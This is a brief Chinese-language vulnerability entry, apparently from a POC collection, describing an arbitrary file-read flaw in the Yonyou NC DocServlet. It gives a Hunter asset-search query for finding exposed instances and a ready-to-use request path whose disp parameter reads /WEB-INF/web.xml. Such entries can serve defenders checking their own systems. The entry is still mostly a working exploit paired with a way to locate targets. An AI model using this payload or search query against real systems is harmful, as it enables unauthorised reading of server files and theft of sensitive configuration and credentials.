用友NC nc.uap.lfw.file.action.DocServlet存在任意文件读取漏洞
一、漏洞简介
用友 NC nc.uap.lfw.file.action.DocServlet存在任意文件读取漏洞,可通过该漏洞获取敏感信息。
二、影响版本
- 用友NC
三、资产测绘
- huiter:
app.name=="用友 UAP"
- 登录页面
四、漏洞复现
/servlet/~webrt/nc.uap.lfw.file.action.DocServlet?disp=/WEB-INF/web.xml